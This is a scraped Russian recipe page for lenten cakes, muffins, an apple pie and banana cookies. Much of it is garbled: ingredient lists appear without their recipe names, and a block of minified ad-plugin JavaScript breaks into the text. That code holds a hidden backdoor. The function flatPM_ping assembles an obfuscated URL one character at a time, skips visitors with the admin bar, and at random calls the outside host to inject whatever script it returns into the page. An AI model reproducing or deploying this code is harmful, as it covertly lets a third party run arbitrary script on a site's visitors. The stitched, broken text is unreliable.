Постный кекс

Постные кексы

В данной рубрике мы собрали для вас самые удачные рецепты постных кексов и маффинов с пошаговыми фотографиями и инструкциями. Готовьте на здоровье!

Похожие подборки рецептов

Упорядочить рецепты по .

Рецепты постных кексов и маффинов, 16 шт. в коллекции

Ингредиенты

Банан спелый – 2 шт.

Мука пшеничная – 2 стакана

Сок мультивитамин – 1 стакан

Клюква сушеная – горсть

Сахар – 0,5 стакана

Масло растительное – 4 ст. л.

Пудра сахарная – 1-2 ст. л.

Ингредиенты

Апельсиновый сок – 160 мл.

Растительное масло – 70 мл.

Ванильный сахар – 1 ч. л.

Разрыхлитель теста – 2 ч. л.

Уксус винный – 1 ст. л.

Манная крупа – 1 ст. л.

Ингредиенты

Сахар – до 0,5 стакана

Растительное масло – 0,5 стакана

Орехи по вкусу – 0,5 стакана

Изюм по желанию – 0,5 стакана

Семена по желанию – 2-3 ст.л.

Ваниль – по вкусу

Разрыхлитель – 10 г

Уксус или сок лимона – 1 ч.л.

Соль – 1 щепотка

2 ВАРИАНТ На 2 стакана морковного жмыха:

Вода – 0,5 стакана

Сахар – до 0,5 стакана

Растительное масло – 0,5 стакана

Орехи по вкусу – 0,5 стакана

Изюм по желанию – 0,5 стакана

Семена по желанию – 2-3 ст.л.

Ваниль – по вкусу

Разрыхлитель – 10 г

Уксус или сок лимона – 1 ч.л.

Соль – 1 щепотка

Ингредиенты

Лайм (или лимон) – 1 штука;

Мята (или мелисса) – листочки 1 пучка;

Вода – около 0,5 стакана;

Растительное масло – 0,5 стакана;

Сахар – до 1 стакана;

Мука – 1,5-2 стакана;

Сода – 0,5 ч. ложки;

Разрыхлитель – 0,5 ч. ложки.

Ингредиенты

Пшеничная мука – 1,5 стакана

Сахар – 0,5 стакана

Рафинированное подсолнечное масло – 0,5 стакана

Жидкий мед – 3 ст.л.

Порошок какао – 3 ст.л.

Корица молотая – 1 ч.л.

Мускатный орех молотый – 0,5 ч.л.

Разрыхлитель – 2 ч.л.

Ванильный сахар – 1 ч.л.

Вяленая вишня или клюква – 0,5 стакана

Измельченные грецкие орехи – 0,5 стакана

Сахарная пудра – 1 ст.л.

Ингредиенты

Какао порошок – 1 – 1,5 ст. ложки;

Вода – 1/2 стакана;

Сахар – 1/2 стакана;

Масло рафинированное растительное – 3 ст. ложки;

Разрыхлитель – 2 ч.л;

Вишня без косточек замороженная – 100 грамм;

Крахмал (или мука) – 1-2 ст. л.

Ингредиенты

Кокосовое молоко – 1 стакан

Кокосовая стружка – 0,5 стакана

Растительное масло – 0,5 стакана

Сахар – 2/3 стакана

Мука – 1,5 стакана

Хлопья злаковые – 0,5 стакана

Разрыхлитель – 1 ч.л.

Ингредиенты

Вода (горячая) – 150 мл

Мука пшеничная – 200 г

Масло растительное – 3 ст.л.

Разрыхлитель теста – 8 г

Малина – 1 горсть

Ингредиенты

Мука рисовая – 2 стакана;

Кокосовое молоко – 2 стакана;

Сахар (коричневый) – 1 стакан;

Разрыхлитель – 8 грамм;

Шоколадные капли – 50 грамм;

Кокосовая стружка – 2-3 ст.л;

Растительное масло – для смазывания формы.

Ингредиенты

Мёд жидкий – 2 ст.л.

Масло растительное – 120 мл

Ингредиенты

Вода или лимонад – 200 мл

Масло растительное – 50 мл

Уксус винный белый 5% – 1 ст.л.

Кофе растворимый – 1.5 ч.л.

Ромовая эссенция – по желанию

Разрыхлитель – 0.5 ч.л.

Ингредиенты

Растительное масло (рафинированное) – 100 мл

Соль – небольшая щепотка

Корица (по желанию) – 1 ч.л.

Разрыхлитель – 1 ч.л.

Для яблочного отвара:

Размер формы – 23х9 см

Ингредиенты

Мука – 2 стакана

Компот из с/ф – 1 стакан

Сахар – до 1 стакана

Растительное масло – 0,5 стакана

Разрыхлитель – 1 ч.л.

Соль – на кончике ножа

Примечание:

1 стакан – 200 мл

Ингредиенты

Мука пшеничная – 200 г

Крахмал картофельный – 1 ст.л.

Разрыхлитель – 1,5 ч.л.

Ванилин – по вкусу

Масло растительное – 3 ст.л.

Молоко кокосовое – 210 мл

Ингредиенты

Семолина – 200 г

Масло растительное – 125 мл

Разрыхлитель – 10 г

Ингредиенты

Овсяные хлопья – 60 г

Бананы без кожуры – 180 г

Апельсиновый или яблочный сок – 60 мл

Масло растительное – 30 мл

Разрыхлитель – 1 ч.л.

Коричневый сахар – 1 ч.л.

Поделитесь коллекцией рецептов с друзьями

АЙМКУК © 2007-2020 год. Все права защищены.
Использование материалов сайта без письменного разрешения, запрещено законом об Авторских правах Гражданского Кодекса Российской Федерации от 18 декабря 2006 года N 230-ФЗ

Постная выпечка

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};

Постная выпечка на скорую руку

Если в настоящее время вы соблюдаете пост – это совсем не означает, что нужно отказываться от выпечки, сладкого десерта. Иногда можно побаловать себя вот такими скорыми в приготовлении блюдами постной выпечки.

Яблочный пирог на дрожжевом тесте

Готовить этот постный пирог мы будем на растительном масле. Но нужно помнить, что подсолнечное (или оливковое масло) разрешены только в некоторые дни поста. Чаще всего, это суббота и воскресенье. То есть прежде чем готовить любую постную выпечку – ее ингредиенты нужно сверять по продуктам, разрешенным в отдельные дни поста.

Чтобы приготовить такой чудесный ароматный пирог нам понадобятся:

• теплая вода, два стакана;
• пшеничная мука, четыре стакана;
• растительное масло, стакан;
• дрожжи, один пакетик сухих (быстрых);
• сахар, сто граммов;
• для начинки яблоки, пять штук средних;
• сок, цедра одного лимона;
• крепкий чай, одна чашка.

Сахар делим напополам. 50 граммов сахара, плюс мука, вода, дрожжи, масло хорошо замешиваются. Нужно дать тесту, накрытому полотенцем в тазу, подняться в тепле. Пока тесто поднимается, яблоки нужно очистить от сердцевины и нарезать произвольно, смешать с цедрой и лимонным соком.

Когда тесто поднимется, его нужно обмять, разделить на две части, раскатать одну часть и уложить на смазанный растительным маслом противень или в форму. Выложить на поверхность теста яблоки, присыпать их сахаром. Накрыть вторым листом раскатанного теста, защипать края. Поставить пирог в духовку. За 10 минут до готовности пирог достаем из духовки и быстро смазываем его крепким чаем, в который добавлен сахар.

Снова ставим в духовку пирог допекаться. Вынули готовый пирог из духовки? Смажьте его чаем с сахаром еще раз, чтобы он приобрел приятный золотистый оттенок. Дайте постоять немного, остыть и можно подавать его к чаю.

Постное печенье …с бананами

Именно бананы заменят в этом печенье яйца, придадут ему требуемую нежность, рыхлость и вязкость. Чтобы приготовить такое удивительное печенье, нужно размять банан вилкой, добавить к нему немного соевого или кокосового молока, овсяные хлопья («геркулес»), горсть промытого изюма, горсть рубленных грецких орехов, немного сахара, совсем чуть-чуть, так как и без того ингредиенты в печенье сладкие.

Сделайте из массы небольшие шарики. Их можно обвалять в лепестках миндаля (продаются в отделах для выпечки). Выкладываем шарики на пекарскую бумагу, застеленную на противень. Ставим в духовку на 10-15 минут. Достаем. Нежный, ароматный, постный десерт готов!

Пошаговый рецепт постного кекса с фото

Во время Великого Поста совершенно не обязательно лишать себя вкусной и здоровой выпечки, так как существует множество вариантов блюд, не содержащих мяса или животного жира.

От бабушки мне досталось несколько рецептов таких изделий, и самым лучшим из них для меня является руководство по изготовлению постного кекса в силиконовых формочках, который можно испечь как в духовке, так и в мультиварке или микроволновке без добавления в процессе замеса теста яиц, сливочного масла и молока. Изделие готовится быстро и не требует наличия опыта у хозяйки.

Сегодня мы с вами реализуем два варианта рецепта постного кекса: первый мы будем замешивать с какао и орехами и запекать в духовке или микроволновке, а второй изготовим для дальнейшей выпечки в мультиварке.

Вам понадобятся

Мука 200 г
Грецкий орех 50 г
Сахар 50 г
Какао в порошке 30 г
Яблочный сок (без сахара) 40 мл
Подсолнечное масло 20 мл
Джем или варенья 50 мл
Сода 5 г
Соль (экстра) 5 г

Подготовка

  1. Муку смешиваем с солью и разрыхлителем.
  2. Затем просеиваем через сито около трех раз.
  3. Орехи выкладываем на разогретую сковороду.
  4. Прокаливаем в течение пяти минут, убираем с плиты.
  5. Затем хорошенько дробим их в пакете при помощи скалки.
  6. Остальные ингредиенты убираем из холодильника за час до начала процесса.

Тесто

  1. Орехи выкладываем в миску, засыпаем сахаром.
  2. Заливаем подсолнечным маслом, перемешиваем.
  3. Добавляем яблочный сок, не прекращая размешивание.

Важно! На этой стадии можно добавить апельсиновую или лимонную цедру, а также немного измельченных цукатов. Кроме того, я еще частенько добавляю несколько штучек размягченного пропаренного изюма.

  1. Затем начинаем понемногу добавлять муку и какао.
  2. Ставим взбиваться на маленькой скорости.
  3. Вмешиваем его вручную деревянной лопаткой.

Выпечка

  1. Духовку включаем и нагреваем до 180 градусов.
  2. Форму (либо маленькие формочки) смазываем подсолнечным маслом.
  3. Ставим выпекаться около получаса (в микроволновке – 20 минут).
  4. Кекс проверяем на готовность зубочисткой или шпажкой.Выключаем духовку и ставим изделие охлаждаться до 70 градусов.
  5. Кекс можно разрезать на пополам и промазав джемом соединить половинки. Сверху можно украсить джемом или сахарной пудрой.
  6. Даем окончательно остыть и перекладываем на блюдо для подачи.

Сделано! Теперь вы точно знаете, как сделать простой и быстрый кекс без яиц и молока, запекая его в духовке либо в микроволновке.

Кстати, сверху ваше изделие можно еще посыпать кондитерской присыпкой, которую покупают в супермаркетах, а также никто вам не запретит придумать что-то свое, поскольку поверхность кекса довольно липкая из-за варенья, и к ней может прилипнуть все что угодно.

Если вы придумали что-нибудь новенькое, напишите об этом в комментариях, чтобы поделиться со всеми своими идеями.

Видеорецепт приготовления постного кекса

Правильный замес и выпечка идеального постного кекса – внимание на ролик ниже.

Но не спешите разливать чай – нам нужно еще испечь второй вариант постного кекса: в мультиварке

Рецепт приготовления постного кекса в мультиварке

Вам понадобятся

  • 180 г сахара;
  • 200 г муки;
  • 50 г какао в порошке;
  • 70 мл подсолнечного масла;
  • 240 мл воды;
  • 10 г разрыхлителя для теста;
  • 20 г ванильного сахара;
  • 20 г клюквы;
  • 5 г соли.

Подготовка

  1. Воду ставим на плиту (или наливаем в чайник).
  2. Доводим до кипения, затем остужаем до комнатной температуры.
  3. Муку, ванильный сахар и соль перемешиваем венчиком.
  4. Добавляем какао и разрыхлитель, просеиваем через сито.
  5. Клюкву промываем, даем обсушиться.

Важно! По этому рецепту можно не добавлять к мучной смеси какао перед просеиванием, чтобы потом всыпать его прямо в тесто, но я не рекомендую делать так: какао тоже нужно хорошенько просеять, чтобы порошок избавился от нежелательных и даже вредных элементов.

Тесто

  1. Сахар высыпаем в глубокую миску, засыпаем мучной смесью.
  2. Перемешиваем венчиком, затем вливаем воду.
  3. Ставим взбиваться на слабой скорости около минуты.
  4. Затем, не выключая блендер, добавляем подсолнечное масло.
  5. Взбиваем тесто еще около половины минуты.
  6. После этого убираем блендер и всыпаем клюкву.
  7. Деревянной лопаткой аккуратно вмешиваем ее в тесто.

Постарайтесь замешать клюкву всего несколькими решительными движениями по часовой стрелке, чтобы не дать ягодам прорваться и выпустить весь сок. Лучше, если клюква останется целенькой.

  1. Чашу мультиварки промываем, покрываем растительным маслом.
  2. Вливаем тесто внутрь, разравниваем лопаточкой.
  3. Ставим запекаться в программе «Выпечка».
  4. Готовому кексу даем остыть и извлекаем его из формы.
  5. Перекладываем на блюдо и посыпаем сахарной пудрой.

Отлично, теперь уже можно подавать ваше изумительное изделие на стол и начинать приятное чаепитие. Моя мама иногда покрывает такой кекс белковой или сахарной глазурью, но он сам по себе невероятно красив и вкусен, так что оформление следует добавлять только в особых случаях, например, если вы приготовили такой кексик к чьему-нибудь дню рождения. Подавайте вашу ароматную выпечку целиком, а уж на столе разрежьте на порционные кусочки.

Видеорецепт приготовления постного кекса в мультиварке

Вкусный и питательный постный кекс в мультиварке – смотрим пошаговое приготовление.

Еще я хотела бы посоветовать вам приготовить несколько других, не менее вкусных кексов. Попробуйте замечательный Шоколадный кекс в мультиварке и хлебопечке , а также изысканный и очень широко известный в наших краях Творожный кекс в мультиварке и хлебопечке.

Кроме того, очень советую всем приготовить один из самых моих любимых Кекс на кефире в мультиварке и необычный Морковный кекс. Вдобавок я часто пеку знаменитый советский Кекс Столичный с изюмом рецепт по госту, так как он точно стоит потраченного времени и усилий. Не переживайте, все рецепты проверены в «боевых» условиях и очень надежны.

Постные шоколадные кексы

Описание

Постная выпечка особенно порадует тех, кто придерживается поста. На ее приготовление не понадобится много времени и больших затрат.

Шоколадная выпечка – это очень ароматно и вкусно! Сегодня предлагаю испечь шоколадные кексы, постные и с клюквой. Рецепт шоколадных кексов очень простой и готовятся они так же быстро, как и съедаются!

Кексов из предложенных продуктов выходит много. Они получаются мягкие, воздушные и очень вкусные!

Ингредиенты:

  • вода – 250 мл.,
  • сахар – 200 гр.,
  • мука – 1,5 стакана,
  • какао порошок – 40 гр.,
  • разрыхлитель – 10 гр.,
  • щепотка соли,
  • раст. масло – 100 мл.,
  • вишня или клюква – для начинки.

Как приготовить:

Продукты для постных шоколадных кексов простые и недорогие. Из таких же продуктов мы на днях пекли шоколадный манник, помните?

Часть кексов, вернее для себя, я испеку с клюквой! Только клюкву или, предположим, изюм нужно на 5 минут замочить в горячей воде. Затем обсушить.

1. Тесто для шоколадных кексов готовится очень просто и быстро. Нам даже не понадобится миксер. Только венчик. В небольшую миску отправьте весь сахар. По желанию можно добавить и ванильный сахар. Вылейте к сахару всю воду (это 250 мл.). Перемешайте венчиков. Дайте сахару раствориться.

2. Затем вылейте раст. масло.

3. Просейте всю муку со щепоткой соли. И тщательно перемешайте венчиком.

4. Далее добавим какао порошок и разрыхлитель.

5. По консистенции шоколадное тесто для кексов должно получиться не очень густое, но и не жидкое.

6. Данное тесто можно испечь одним большим кексом. В прочим, тоже самое хотела сделать и я, но в последний момент передумала. Деткам больше нравятся маленькие кексы в бумажных капсулах.

Заполнить шоколадным тестом бумажные вкладыши на 2/3. У меня вкладыши средние и всего получилось 20 кексов. Выпекала сначала 12 кексов, а остальное тесто спокойно ждало в пакете. С ним ничего не случилось.

Выпекала шоколадные кексы при 180ºС, в течение 25 минут. Не пересушите кексы. 7. Готовность кексов проверяем деревянной шпажкой.

8. После выпечки сразу переносим кексы на решетку.

Пусть остывают.

Если желаете шоколадные постные кексы можно посыпать сахарной пудрой или приготовить для них постную шоколадную глазурь. Для глазури соедините 3 ложки сахара, 3 ложки воды и ложку какао. Для того, чтоб глазурь блестела, добавьте еще и ложку раст. масла. Отправьте продукты на огонь и доведите глазурь до густоты. Не обязательно глазурь кипятить.

Посмотрите, какие постные кексы получаются. Они рыхлые, мягкие, вкусные и очень ароматные.

Друзья, приятного чаепития и до новых рецептов!

На заметку: в тесто для постных кексов можно добавить орехи, изюм или другие сухофрукты. А для усиленного вкуса, можно и ложечку растворимого кофе.